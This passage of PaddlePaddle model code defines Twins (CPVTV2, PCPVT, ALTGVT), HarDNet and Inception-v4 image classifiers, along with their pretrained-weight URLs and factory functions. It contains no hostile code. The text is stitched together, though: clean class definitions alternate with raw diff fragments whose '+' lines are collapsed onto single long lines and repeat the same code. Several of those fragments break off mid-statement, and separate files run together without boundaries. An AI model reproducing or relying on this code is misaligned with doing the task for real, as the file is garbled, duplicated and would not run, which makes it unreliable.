                         sr_ratios, block_cls)
        # PEG + GAP replace absolute position embeddings and the cls token
        del self.pos_embeds
        del self.cls_token
        self.pos_block = nn.LayerList(
            [PosCNN(embed_dim, embed_dim) for embed_dim in embed_dims])
        self.apply(self._init_weights)

    def _init_weights(self, m):
        import math
        if isinstance(m, nn.Linear):
            trunc_normal_(m.weight)
            if m.bias is not None:
                zeros_(m.bias)
        elif isinstance(m, nn.LayerNorm):
            zeros_(m.bias)
            ones_(m.weight)
        elif isinstance(m, nn.Conv2D):
            # He-style normal init over the conv fan-out
            fan_out = m._kernel_size[0] * m._kernel_size[1] * m._out_channels
            fan_out //= m._groups
            normal_(0, math.sqrt(2.0 / fan_out))(m.weight)
            if m.bias is not None:
                zeros_(m.bias)
        elif isinstance(m, nn.BatchNorm2D):
            # fix: paddle parameters have no torch-style .data.fill_() /
            # .data.zero_(); use the paddle initializers already in scope
            ones_(m.weight)
            zeros_(m.bias)

    def forward_features(self, x):
        B = x.shape[0]

        for i in range(len(self.depths)):
            x, (H, W) = self.patch_embeds[i](x)
            x = self.pos_drops[i](x)

            for j, blk in enumerate(self.blocks[i]):
                x = blk(x, H, W)
                if j == 0:
                    x = self.pos_block[i](x, H, W)  # PEG here

            if i < len(self.depths) - 1:
                # tokens -> NCHW for the next stage's patch embedding
                x = x.reshape([B, H, W, x.shape[-1]]).transpose([0, 3, 1, 2])

        x = self.norm(x)
        return x.mean(axis=1)  # GAP here
class PCPVT(CPVTV2):
    """Twins-PCPVT: CPVTV2 configured with separable attention blocks."""

    def __init__(self,
                 img_size=224,
                 patch_size=4,
                 in_chans=3,
                 class_num=1000,
                 embed_dims=[64, 128, 256],
                 num_heads=[1, 2, 4],
                 mlp_ratios=[4, 4, 4],
                 qkv_bias=False,
                 qk_scale=None,
                 drop_rate=0.,
                 attn_drop_rate=0.,
                 drop_path_rate=0.,
                 norm_layer=nn.LayerNorm,
                 depths=[4, 4, 4],
                 sr_ratios=[4, 2, 1],
                 block_cls=SBlock):
        super().__init__(img_size, patch_size, in_chans, class_num, embed_dims,
                         num_heads, mlp_ratios, qkv_bias, qk_scale, drop_rate,
                         attn_drop_rate, drop_path_rate, norm_layer, depths,
                         sr_ratios, block_cls)


class ALTGVT(PCPVT):
    """
    alias Twins-SVT
    """

    def __init__(self,
                 img_size=224,
                 patch_size=4,
                 in_chans=3,
                 class_num=1000,
                 embed_dims=[64, 128, 256],
                 num_heads=[1, 2, 4],
                 mlp_ratios=[4, 4, 4],
                 qkv_bias=False,
                 qk_scale=None,
                 drop_rate=0.,
                 attn_drop_rate=0.,
                 drop_path_rate=0.,
                 norm_layer=nn.LayerNorm,
                 depths=[4, 4, 4],
                 sr_ratios=[4, 2, 1],
                 block_cls=GroupBlock,
                 wss=[7, 7, 7]):
        super().__init__(img_size, patch_size, in_chans, class_num, embed_dims,
                         num_heads, mlp_ratios, qkv_bias, qk_scale, drop_rate,
                         attn_drop_rate, drop_path_rate, norm_layer, depths,
                         sr_ratios, block_cls)
        # Rebuild the transformer stages: even-indexed blocks use
        # locally-grouped attention (window wss[k]), odd-indexed blocks use
        # global sub-sampled attention (ws=1).
        del self.blocks
        self.wss = wss
        # stochastic depth decay rule
        drop_path_rates = [
            x.numpy()[0]
            for x in paddle.linspace(0, drop_path_rate, sum(depths))
        ]
        offset = 0
        self.blocks = nn.LayerList()
        for stage_idx in range(len(depths)):
            stage = nn.LayerList([
                block_cls(
                    dim=embed_dims[stage_idx],
                    num_heads=num_heads[stage_idx],
                    mlp_ratio=mlp_ratios[stage_idx],
                    qkv_bias=qkv_bias,
                    qk_scale=qk_scale,
                    drop=drop_rate,
                    attn_drop=attn_drop_rate,
                    drop_path=drop_path_rates[offset + blk_idx],
                    norm_layer=norm_layer,
                    sr_ratio=sr_ratios[stage_idx],
                    ws=1 if blk_idx % 2 == 1 else wss[stage_idx])
                for blk_idx in range(depths[stage_idx])
            ])
            self.blocks.append(stage)
            offset += depths[stage_idx]
        self.apply(self._init_weights)
norm_layer=norm_layer, + sr_ratio=sr_ratios[k], + ws=1 if i % 2 == 1 else wss[k]) for i in range(depths[k]) + ]) + self.blocks.append(_block) + cur += depths[k] + self.apply(self._init_weights) + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` or `boolean` type." + ) + + +def pcpvt_small(pretrained=False, use_ssld=False, **kwargs): + model = CPVTV2( + patch_size=4, + embed_dims=[64, 128, 320, 512], + num_heads=[1, 2, 5, 8], + mlp_ratios=[8, 8, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[3, 4, 6, 3], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["pcpvt_small"], use_ssld=use_ssld) + return model + + +def pcpvt_base(pretrained=False, use_ssld=False, **kwargs): + model = CPVTV2( + patch_size=4, + embed_dims=[64, 128, 320, 512], + num_heads=[1, 2, 5, 8], + mlp_ratios=[8, 8, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[3, 4, 18, 3], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["pcpvt_base"], use_ssld=use_ssld) + return model + + +def pcpvt_large(pretrained=False, use_ssld=False, **kwargs): + model = CPVTV2( + patch_size=4, + embed_dims=[64, 128, 320, 512], + num_heads=[1, 2, 5, 8], + mlp_ratios=[8, 8, 4, 4], + qkv_bias=True, + norm_layer=partial( + nn.LayerNorm, epsilon=1e-6), + depths=[3, 8, 27, 3], + sr_ratios=[8, 4, 2, 1], + **kwargs) + _load_pretrained( + pretrained, model, MODEL_URLS["pcpvt_large"], use_ssld=use_ssld) + return model + + +def alt_gvt_small(pretrained=False, use_ssld=False, **kwargs): + model = ALTGVT( + patch_size=4, + embed_dims=[64, 128, 256, 512], + num_heads=[2, 
def alt_gvt_base(pretrained=False, use_ssld=False, **kwargs):
    """Twins-SVT (ALTGVT) base."""
    cfg = dict(
        patch_size=4,
        embed_dims=[96, 192, 384, 768],
        num_heads=[3, 6, 12, 24],
        mlp_ratios=[4, 4, 4, 4],
        qkv_bias=True,
        norm_layer=partial(
            nn.LayerNorm, epsilon=1e-6),
        depths=[2, 2, 18, 2],
        wss=[7, 7, 7, 7],
        sr_ratios=[8, 4, 2, 1])
    model = ALTGVT(**cfg, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["alt_gvt_base"], use_ssld=use_ssld)
    return model


def alt_gvt_large(pretrained=False, use_ssld=False, **kwargs):
    """Twins-SVT (ALTGVT) large."""
    cfg = dict(
        patch_size=4,
        embed_dims=[128, 256, 512, 1024],
        num_heads=[4, 8, 16, 32],
        mlp_ratios=[4, 4, 4, 4],
        qkv_bias=True,
        norm_layer=partial(
            nn.LayerNorm, epsilon=1e-6),
        depths=[2, 2, 18, 2],
        wss=[7, 7, 7, 7],
        sr_ratios=[8, 4, 2, 1])
    model = ALTGVT(**cfg, **kwargs)
    _load_pretrained(
        pretrained, model, MODEL_URLS["alt_gvt_large"], use_ssld=use_ssld)
    return model
MODEL_URLS = {
    'HarDNet39_ds':
    'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet39_ds_pretrained.pdparams',
    'HarDNet68_ds':
    'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet68_ds_pretrained.pdparams',
    'HarDNet68':
    'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet68_pretrained.pdparams',
    'HarDNet85':
    'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/HarDNet85_pretrained.pdparams'
}

# consistency fix: sibling model_zoo files export a list, and a list is the
# conventional type for __all__ (dict_keys happened to work but is fragile)
__all__ = list(MODEL_URLS.keys())


def ConvLayer(in_channels,
              out_channels,
              kernel_size=3,
              stride=1,
              bias_attr=False):
    """Conv2D + BatchNorm2D + ReLU6 with 'same' padding for odd kernels."""
    layer = nn.Sequential(
        ('conv', nn.Conv2D(
            in_channels,
            out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=kernel_size // 2,
            groups=1,
            bias_attr=bias_attr)), ('norm', nn.BatchNorm2D(out_channels)),
        ('relu', nn.ReLU6()))
    return layer


def DWConvLayer(in_channels,
                out_channels,
                kernel_size=3,
                stride=1,
                bias_attr=False):
    """Depthwise Conv2D + BatchNorm2D (no activation).

    fix: padding was hard-coded to 1, silently wrong for any
    kernel_size != 3; generalized to (kernel_size - 1) // 2, which is
    identical (1) for the kernel_size=3 used throughout this file.
    """
    layer = nn.Sequential(
        ('dwconv', nn.Conv2D(
            in_channels,
            out_channels,
            kernel_size=kernel_size,
            stride=stride,
            padding=(kernel_size - 1) // 2,
            groups=out_channels,
            bias_attr=bias_attr)), ('norm', nn.BatchNorm2D(out_channels)))
    return layer


def CombConvLayer(in_channels, out_channels, kernel_size=1, stride=1):
    """Pointwise ConvLayer followed by a depthwise DWConvLayer."""
    layer = nn.Sequential(
        ('layer1', ConvLayer(
            in_channels, out_channels, kernel_size=kernel_size)),
        ('layer2', DWConvLayer(
            out_channels, out_channels, stride=stride)))
    return layer
class HarDBlock(nn.Layer):
    """One Harmonic-Dense block.

    Layer i takes the concatenation of the outputs selected by
    get_link(i + 1, ...); the block output concatenates the base input
    (optionally), the last layer and every odd-indexed layer.
    """

    def __init__(self,
                 in_channels,
                 growth_rate,
                 grmul,
                 n_layers,
                 keepBase=False,
                 residual_out=False,
                 dwconv=False):
        super().__init__()
        self.keepBase = keepBase
        self.links = []
        self.out_channels = 0  # if upsample else in_channels
        convs = []
        for idx in range(n_layers):
            outch, inch, link = self.get_link(idx + 1, in_channels,
                                              growth_rate, grmul)
            self.links.append(link)
            conv_fn = CombConvLayer if dwconv else ConvLayer
            convs.append(conv_fn(inch, outch))
            # even-indexed layers and the final layer feed the block output
            if idx % 2 == 0 or idx == n_layers - 1:
                self.out_channels += outch
        self.layers = nn.LayerList(convs)

    def get_link(self, layer, base_ch, growth_rate, grmul):
        """Return (out_channels, in_channels, link) for a given layer index.

        link lists the earlier layers (power-of-two strides back) that feed
        this layer; out_channels grows by grmul per extra link and is
        rounded to an even number.
        """
        if layer == 0:
            return base_ch, 0, []
        out_channels = growth_rate
        link = []
        for i in range(10):
            dv = 2**i
            if layer % dv == 0:
                link.append(layer - dv)
                if i > 0:
                    out_channels *= grmul
        # round to the nearest even channel count
        out_channels = int(int(out_channels + 1) / 2) * 2
        in_channels = 0
        for src in link:
            ch, _, _ = self.get_link(src, base_ch, growth_rate, grmul)
            in_channels += ch
        return out_channels, in_channels, link

    def forward(self, x):
        outputs = [x]
        for conv, link in zip(self.layers, self.links):
            taps = [outputs[i] for i in link]
            feed = paddle.concat(taps, 1) if len(taps) > 1 else taps[0]
            outputs.append(conv(feed))

        total = len(outputs)
        keep = [
            outputs[i] for i in range(total)
            if (i == 0 and self.keepBase) or i == total - 1 or i % 2 == 1
        ]
        return paddle.concat(keep, 1)


class HarDNet(nn.Layer):
    """HarDNet classification backbone (arch 39, 68 or 85)."""

    def __init__(self,
                 depth_wise=False,
                 arch=85,
                 class_num=1000,
                 with_pool=True):
        super().__init__()
        first_ch = [32, 64]
        second_kernel = 3
        max_pool = True
        grmul = 1.7
        drop_rate = 0.1

        # HarDNet68 (default configuration)
        ch_list = [128, 256, 320, 640, 1024]
        gr = [14, 16, 20, 40, 160]
        n_layers = [8, 16, 16, 16, 4]
        downSamp = [1, 0, 1, 1, 0]

        if arch == 85:
            # HarDNet85
            first_ch = [48, 96]
            ch_list = [192, 256, 320, 480, 720, 1280]
            gr = [24, 24, 28, 36, 48, 256]
            n_layers = [8, 16, 16, 16, 16, 4]
            downSamp = [1, 0, 1, 0, 1, 0]
            drop_rate = 0.2
        elif arch == 39:
            # HarDNet39
            first_ch = [24, 48]
            ch_list = [96, 320, 640, 1024]
            grmul = 1.6
            gr = [16, 20, 64, 160]
            n_layers = [4, 16, 8, 4]
            downSamp = [1, 1, 1, 0]

        if depth_wise:
            second_kernel = 1
            max_pool = False
            drop_rate = 0.05

        blks = len(n_layers)
        self.base = nn.LayerList([])

        # First Layer: Standard Conv3x3, Stride=2
        self.base.append(
            ConvLayer(
                in_channels=3,
                out_channels=first_ch[0],
                kernel_size=3,
                stride=2,
                bias_attr=False))

        # Second Layer
        self.base.append(
            ConvLayer(
                first_ch[0], first_ch[1], kernel_size=second_kernel))

        # Maxpooling or DWConv3x3 downsampling
        if max_pool:
            self.base.append(nn.MaxPool2D(kernel_size=3, stride=2, padding=1))
        else:
            self.base.append(DWConvLayer(first_ch[1], first_ch[1], stride=2))

        # Build all HarDNet blocks
        channels = first_ch[1]
        for idx in range(blks):
            hard_block = HarDBlock(
                channels, gr[idx], grmul, n_layers[idx], dwconv=depth_wise)
            channels = hard_block.out_channels
            self.base.append(hard_block)

            if idx == blks - 1 and arch == 85:
                self.base.append(nn.Dropout(0.1))

            # 1x1 transition conv to the per-stage channel count
            self.base.append(ConvLayer(channels, ch_list[idx], kernel_size=1))
            channels = ch_list[idx]
            if downSamp[idx] == 1:
                if max_pool:
                    self.base.append(nn.MaxPool2D(kernel_size=2, stride=2))
                else:
                    self.base.append(DWConvLayer(channels, channels, stride=2))

        channels = ch_list[blks - 1]

        # Classification head: GAP -> Flatten -> Dropout -> Linear
        head_layers = []
        if with_pool:
            head_layers.append(nn.AdaptiveAvgPool2D((1, 1)))
        if class_num > 0:
            head_layers.append(nn.Flatten())
            head_layers.append(nn.Dropout(drop_rate))
            head_layers.append(nn.Linear(channels, class_num))
        self.base.append(nn.Sequential(*head_layers))

    def forward(self, x):
        for layer in self.base:
            x = layer(x)
        return x


def _load_pretrained(pretrained, model, model_url, use_ssld=False):
    """Optionally load pretrained weights (False / True / local path)."""
    if pretrained is False:
        return
    if pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )
def HarDNet39_ds(pretrained=False, **kwargs):
    """HarDNet-39 with depth-wise separable convolutions."""
    net = HarDNet(depth_wise=True, arch=39, **kwargs)
    _load_pretrained(pretrained, net, MODEL_URLS["HarDNet39_ds"])
    return net


def HarDNet68_ds(pretrained=False, **kwargs):
    """HarDNet-68 with depth-wise separable convolutions."""
    net = HarDNet(depth_wise=True, arch=68, **kwargs)
    _load_pretrained(pretrained, net, MODEL_URLS["HarDNet68_ds"])
    return net


def HarDNet68(pretrained=False, **kwargs):
    """Standard HarDNet-68."""
    net = HarDNet(arch=68, **kwargs)
    _load_pretrained(pretrained, net, MODEL_URLS["HarDNet68"])
    return net


def HarDNet85(pretrained=False, **kwargs):
    """Standard HarDNet-85."""
    net = HarDNet(arch=85, **kwargs)
    _load_pretrained(pretrained, net, MODEL_URLS["HarDNet85"])
    return net
MODEL_URLS = {
    "InceptionV4":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/InceptionV4_pretrained.pdparams"
}

__all__ = list(MODEL_URLS.keys())


class ConvBNLayer(nn.Layer):
    """Conv2D (no bias) followed by BatchNorm with a fused activation."""

    def __init__(self,
                 num_channels,
                 num_filters,
                 filter_size,
                 stride=1,
                 padding=0,
                 groups=1,
                 act='relu',
                 name=None):
        super(ConvBNLayer, self).__init__()
        self._conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=padding,
            groups=groups,
            weight_attr=ParamAttr(name=name + "_weights"),
            bias_attr=False)
        bn_name = name + "_bn"
        self._batch_norm = BatchNorm(
            num_filters,
            act=act,
            param_attr=ParamAttr(name=bn_name + "_scale"),
            bias_attr=ParamAttr(name=bn_name + "_offset"),
            moving_mean_name=bn_name + '_mean',
            moving_variance_name=bn_name + '_variance')

    def forward(self, inputs):
        return self._batch_norm(self._conv(inputs))


class InceptionStem(nn.Layer):
    """Inception-v4 stem: three 3x3 convs, then three mixed reductions
    (pool/conv, 3x3 vs 1x7-7x1 branches, conv/pool), ending at 384 ch."""

    def __init__(self):
        super(InceptionStem, self).__init__()
        self._conv_1 = ConvBNLayer(
            3, 32, 3, stride=2, act="relu", name="conv1_3x3_s2")
        self._conv_2 = ConvBNLayer(32, 32, 3, act="relu", name="conv2_3x3_s1")
        self._conv_3 = ConvBNLayer(
            32, 64, 3, padding=1, act="relu", name="conv3_3x3_s1")
        self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0)
        self._conv2 = ConvBNLayer(
            64, 96, 3, stride=2, act="relu", name="inception_stem1_3x3_s2")
        self._conv1_1 = ConvBNLayer(
            160, 64, 1, act="relu", name="inception_stem2_3x3_reduce")
        self._conv1_2 = ConvBNLayer(
            64, 96, 3, act="relu", name="inception_stem2_3x3")
        self._conv2_1 = ConvBNLayer(
            160, 64, 1, act="relu", name="inception_stem2_1x7_reduce")
        self._conv2_2 = ConvBNLayer(
            64,
            64, (7, 1),
            padding=(3, 0),
            act="relu",
            name="inception_stem2_1x7")
        self._conv2_3 = ConvBNLayer(
            64,
            64, (1, 7),
            padding=(0, 3),
            act="relu",
            name="inception_stem2_7x1")
        self._conv2_4 = ConvBNLayer(
            64, 96, 3, act="relu", name="inception_stem2_3x3_2")
        self._conv3 = ConvBNLayer(
            192, 192, 3, stride=2, act="relu", name="inception_stem3_3x3_s2")

    def forward(self, inputs):
        x = self._conv_1(inputs)
        x = self._conv_2(x)
        x = self._conv_3(x)

        # reduction 1: parallel max-pool and strided conv
        x = paddle.concat([self._pool(x), self._conv2(x)], axis=1)

        # reduction 2: plain 3x3 branch vs factorized 7x1 / 1x7 branch
        branch_a = self._conv1_2(self._conv1_1(x))
        branch_b = self._conv2_1(x)
        branch_b = self._conv2_2(branch_b)
        branch_b = self._conv2_3(branch_b)
        branch_b = self._conv2_4(branch_b)
        x = paddle.concat([branch_a, branch_b], axis=1)

        # reduction 3: strided conv and max-pool
        return paddle.concat([self._conv3(x), self._pool(x)], axis=1)
name="inception_stem2_3x3") + self._conv2_1 = ConvBNLayer( + 160, 64, 1, act="relu", name="inception_stem2_1x7_reduce") + self._conv2_2 = ConvBNLayer( + 64, + 64, (7, 1), + padding=(3, 0), + act="relu", + name="inception_stem2_1x7") + self._conv2_3 = ConvBNLayer( + 64, + 64, (1, 7), + padding=(0, 3), + act="relu", + name="inception_stem2_7x1") + self._conv2_4 = ConvBNLayer( + 64, 96, 3, act="relu", name="inception_stem2_3x3_2") + self._conv3 = ConvBNLayer( + 192, 192, 3, stride=2, act="relu", name="inception_stem3_3x3_s2") + + def forward(self, inputs): + conv = self._conv_1(inputs) + conv = self._conv_2(conv) + conv = self._conv_3(conv) + + pool1 = self._pool(conv) + conv2 = self._conv2(conv) + concat = paddle.concat([pool1, conv2], axis=1) + + conv1 = self._conv1_1(concat) + conv1 = self._conv1_2(conv1) + + conv2 = self._conv2_1(concat) + conv2 = self._conv2_2(conv2) + conv2 = self._conv2_3(conv2) + conv2 = self._conv2_4(conv2) + + concat = paddle.concat([conv1, conv2], axis=1) + + conv1 = self._conv3(concat) + pool1 = self._pool(concat) + + concat = paddle.concat([conv1, pool1], axis=1) + return concat + + +class InceptionA(nn.Layer): + def __init__(self, name): + super(InceptionA, self).__init__() + self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1) + self._conv1 = ConvBNLayer( + 384, 96, 1, act="relu", name="inception_a" + name + "_1x1") + self._conv2 = ConvBNLayer( + 384, 96, 1, act="relu", name="inception_a" + name + "_1x1_2") + self._conv3_1 = ConvBNLayer( + 384, 64, 1, act="relu", name="inception_a" + name + "_3x3_reduce") + self._conv3_2 = ConvBNLayer( + 64, + 96, + 3, + padding=1, + act="relu", + name="inception_a" + name + "_3x3") + self._conv4_1 = ConvBNLayer( + 384, + 64, + 1, + act="relu", + name="inception_a" + name + "_3x3_2_reduce") + self._conv4_2 = ConvBNLayer( + 64, + 96, + 3, + padding=1, + act="relu", + name="inception_a" + name + "_3x3_2") + self._conv4_3 = ConvBNLayer( + 96, + 96, + 3, + padding=1, + act="relu", + name="inception_a" 
+ name + "_3x3_3") + + def forward(self, inputs): + pool1 = self._pool(inputs) + conv1 = self._conv1(pool1) + + conv2 = self._conv2(inputs) + + conv3 = self._conv3_1(inputs) + conv3 = self._conv3_2(conv3) + + conv4 = self._conv4_1(inputs) + conv4 = self._conv4_2(conv4) + conv4 = self._conv4_3(conv4) + + concat = paddle.concat([conv1, conv2, conv3, conv4], axis=1) + return concat + + +class ReductionA(nn.Layer): + def __init__(self): + super(ReductionA, self).__init__() + self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0) + self._conv2 = ConvBNLayer( + 384, 384, 3, stride=2, act="relu", name="reduction_a_3x3") + self._conv3_1 = ConvBNLayer( + 384, 192, 1, act="relu", name="reduction_a_3x3_2_reduce") + self._conv3_2 = ConvBNLayer( + 192, 224, 3, padding=1, act="relu", name="reduction_a_3x3_2") + self._conv3_3 = ConvBNLayer( + 224, 256, 3, stride=2, act="relu", name="reduction_a_3x3_3") + + def forward(self, inputs): + pool1 = self._pool(inputs) + conv2 = self._conv2(inputs) + conv3 = self._conv3_1(inputs) + conv3 = self._conv3_2(conv3) + conv3 = self._conv3_3(conv3) + concat = paddle.concat([pool1, conv2, conv3], axis=1) + return concat + + +class InceptionB(nn.Layer): + def __init__(self, name=None): + super(InceptionB, self).__init__() + self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1) + self._conv1 = ConvBNLayer( + 1024, 128, 1, act="relu", name="inception_b" + name + "_1x1") + self._conv2 = ConvBNLayer( + 1024, 384, 1, act="relu", name="inception_b" + name + "_1x1_2") + self._conv3_1 = ConvBNLayer( + 1024, + 192, + 1, + act="relu", + name="inception_b" + name + "_1x7_reduce") + self._conv3_2 = ConvBNLayer( + 192, + 224, (1, 7), + padding=(0, 3), + act="relu", + name="inception_b" + name + "_1x7") + self._conv3_3 = ConvBNLayer( + 224, + 256, (7, 1), + padding=(3, 0), + act="relu", + name="inception_b" + name + "_7x1") + self._conv4_1 = ConvBNLayer( + 1024, + 192, + 1, + act="relu", + name="inception_b" + name + "_7x1_2_reduce") + self._conv4_2 = 
class ReductionB(nn.Layer):
    """Reduction-B: 1024 -> 1536 channels, spatial /2 (pool, 1x1-strided-3x3,
    1x1-1x7-7x1-strided-3x3 branches)."""

    def __init__(self):
        super(ReductionB, self).__init__()
        self._pool = MaxPool2D(kernel_size=3, stride=2, padding=0)
        self._conv2_1 = ConvBNLayer(
            1024, 192, 1, act="relu", name="reduction_b_3x3_reduce")
        self._conv2_2 = ConvBNLayer(
            192, 192, 3, stride=2, act="relu", name="reduction_b_3x3")
        self._conv3_1 = ConvBNLayer(
            1024, 256, 1, act="relu", name="reduction_b_1x7_reduce")
        self._conv3_2 = ConvBNLayer(
            256,
            256, (1, 7),
            padding=(0, 3),
            act="relu",
            name="reduction_b_1x7")
        self._conv3_3 = ConvBNLayer(
            256,
            320, (7, 1),
            padding=(3, 0),
            act="relu",
            name="reduction_b_7x1")
        self._conv3_4 = ConvBNLayer(
            320, 320, 3, stride=2, act="relu", name="reduction_b_3x3_2")

    def forward(self, inputs):
        branch_pool = self._pool(inputs)

        branch_3x3 = self._conv2_2(self._conv2_1(inputs))

        branch_7x7 = self._conv3_1(inputs)
        branch_7x7 = self._conv3_2(branch_7x7)
        branch_7x7 = self._conv3_3(branch_7x7)
        branch_7x7 = self._conv3_4(branch_7x7)

        return paddle.concat([branch_pool, branch_3x3, branch_7x7], axis=1)
class InceptionC(nn.Layer):
    """Inception-C cell (1536 ch): avg-pool, 1x1, and two split 1x3/3x1
    branches whose halves are concatenated."""

    def __init__(self, name=None):
        super(InceptionC, self).__init__()
        self._pool = AvgPool2D(kernel_size=3, stride=1, padding=1)
        self._conv1 = ConvBNLayer(
            1536, 256, 1, act="relu", name="inception_c" + name + "_1x1")
        self._conv2 = ConvBNLayer(
            1536, 256, 1, act="relu", name="inception_c" + name + "_1x1_2")
        self._conv3_0 = ConvBNLayer(
            1536, 384, 1, act="relu", name="inception_c" + name + "_1x1_3")
        self._conv3_1 = ConvBNLayer(
            384,
            256, (1, 3),
            padding=(0, 1),
            act="relu",
            name="inception_c" + name + "_1x3")
        self._conv3_2 = ConvBNLayer(
            384,
            256, (3, 1),
            padding=(1, 0),
            act="relu",
            name="inception_c" + name + "_3x1")
        self._conv4_0 = ConvBNLayer(
            1536, 384, 1, act="relu", name="inception_c" + name + "_1x1_4")
        self._conv4_00 = ConvBNLayer(
            384,
            448, (1, 3),
            padding=(0, 1),
            act="relu",
            name="inception_c" + name + "_1x3_2")
        self._conv4_000 = ConvBNLayer(
            448,
            512, (3, 1),
            padding=(1, 0),
            act="relu",
            name="inception_c" + name + "_3x1_2")
        self._conv4_1 = ConvBNLayer(
            512,
            256, (1, 3),
            padding=(0, 1),
            act="relu",
            name="inception_c" + name + "_1x3_3")
        self._conv4_2 = ConvBNLayer(
            512,
            256, (3, 1),
            padding=(1, 0),
            act="relu",
            name="inception_c" + name + "_3x1_3")

    def forward(self, inputs):
        branch_pool = self._conv1(self._pool(inputs))
        branch_1x1 = self._conv2(inputs)

        # split branch: one 1x1 stem, two parallel 1x3 / 3x1 heads
        stem_a = self._conv3_0(inputs)
        split_a1 = self._conv3_1(stem_a)
        split_a2 = self._conv3_2(stem_a)

        # deeper split branch: 1x1 -> 1x3 -> 3x1 stem, then parallel heads
        stem_b = self._conv4_0(inputs)
        stem_b = self._conv4_00(stem_b)
        stem_b = self._conv4_000(stem_b)
        split_b1 = self._conv4_1(stem_b)
        split_b2 = self._conv4_2(stem_b)

        return paddle.concat(
            [branch_pool, branch_1x1, split_a1, split_a2, split_b1, split_b2],
            axis=1)


class InceptionV4DY(nn.Layer):
    """Inception-v4 network: stem, 4xA, Reduction-A, 7xB, Reduction-B,
    3xC, global average pool, dropout and linear classifier."""

    def __init__(self, class_num=1000):
        super(InceptionV4DY, self).__init__()
        self._inception_stem = InceptionStem()

        self._inceptionA_1 = InceptionA(name="1")
        self._inceptionA_2 = InceptionA(name="2")
        self._inceptionA_3 = InceptionA(name="3")
        self._inceptionA_4 = InceptionA(name="4")
        self._reductionA = ReductionA()

        self._inceptionB_1 = InceptionB(name="1")
        self._inceptionB_2 = InceptionB(name="2")
        self._inceptionB_3 = InceptionB(name="3")
        self._inceptionB_4 = InceptionB(name="4")
        self._inceptionB_5 = InceptionB(name="5")
        self._inceptionB_6 = InceptionB(name="6")
        self._inceptionB_7 = InceptionB(name="7")
        self._reductionB = ReductionB()

        self._inceptionC_1 = InceptionC(name="1")
        self._inceptionC_2 = InceptionC(name="2")
        self._inceptionC_3 = InceptionC(name="3")

        self.avg_pool = AdaptiveAvgPool2D(1)
        self._drop = Dropout(p=0.2, mode="downscale_in_infer")
        stdv = 1.0 / math.sqrt(1536 * 1.0)
        self.out = Linear(
            1536,
            class_num,
            weight_attr=ParamAttr(
                initializer=Uniform(-stdv, stdv), name="final_fc_weights"),
            bias_attr=ParamAttr(name="final_fc_offset"))

    def forward(self, inputs):
        x = self._inception_stem(inputs)
        stages = [
            self._inceptionA_1, self._inceptionA_2, self._inceptionA_3,
            self._inceptionA_4, self._reductionA, self._inceptionB_1,
            self._inceptionB_2, self._inceptionB_3, self._inceptionB_4,
            self._inceptionB_5, self._inceptionB_6, self._inceptionB_7,
            self._reductionB, self._inceptionC_1, self._inceptionC_2,
            self._inceptionC_3
        ]
        for stage in stages:
            x = stage(x)

        x = self.avg_pool(x)
        x = paddle.squeeze(x, axis=[2, 3])
        x = self._drop(x)
        return self.out(x)
self._inceptionA_2 = InceptionA(name="2") + self._inceptionA_3 = InceptionA(name="3") + self._inceptionA_4 = InceptionA(name="4") + self._reductionA = ReductionA() + + self._inceptionB_1 = InceptionB(name="1") + self._inceptionB_2 = InceptionB(name="2") + self._inceptionB_3 = InceptionB(name="3") + self._inceptionB_4 = InceptionB(name="4") + self._inceptionB_5 = InceptionB(name="5") + self._inceptionB_6 = InceptionB(name="6") + self._inceptionB_7 = InceptionB(name="7") + self._reductionB = ReductionB() + + self._inceptionC_1 = InceptionC(name="1") + self._inceptionC_2 = InceptionC(name="2") + self._inceptionC_3 = InceptionC(name="3") + + self.avg_pool = AdaptiveAvgPool2D(1) + self._drop = Dropout(p=0.2, mode="downscale_in_infer") + stdv = 1.0 / math.sqrt(1536 * 1.0) + self.out = Linear( + 1536, + class_num, + weight_attr=ParamAttr( + initializer=Uniform(-stdv, stdv), name="final_fc_weights"), + bias_attr=ParamAttr(name="final_fc_offset")) + + def forward(self, inputs): + x = self._inception_stem(inputs) + + x = self._inceptionA_1(x) + x = self._inceptionA_2(x) + x = self._inceptionA_3(x) + x = self._inceptionA_4(x) + x = self._reductionA(x) + + x = self._inceptionB_1(x) + x = self._inceptionB_2(x) + x = self._inceptionB_3(x) + x = self._inceptionB_4(x) + x = self._inceptionB_5(x) + x = self._inceptionB_6(x) + x = self._inceptionB_7(x) + x = self._reductionB(x) + + x = self._inceptionC_1(x) + x = self._inceptionC_2(x) + x = self._inceptionC_3(x) + + x = self.avg_pool(x) + x = paddle.squeeze(x, axis=[2, 3]) + x = self._drop(x) + x = self.out(x) + return x + + +def _load_pretrained(pretrained, model, model_url, use_ssld=False): + if pretrained is False: + pass + elif pretrained is True: + load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld) + elif isinstance(pretrained, str): + load_dygraph_pretrain(model, pretrained) + else: + raise RuntimeError( + "pretrained type is not available. Please use `string` 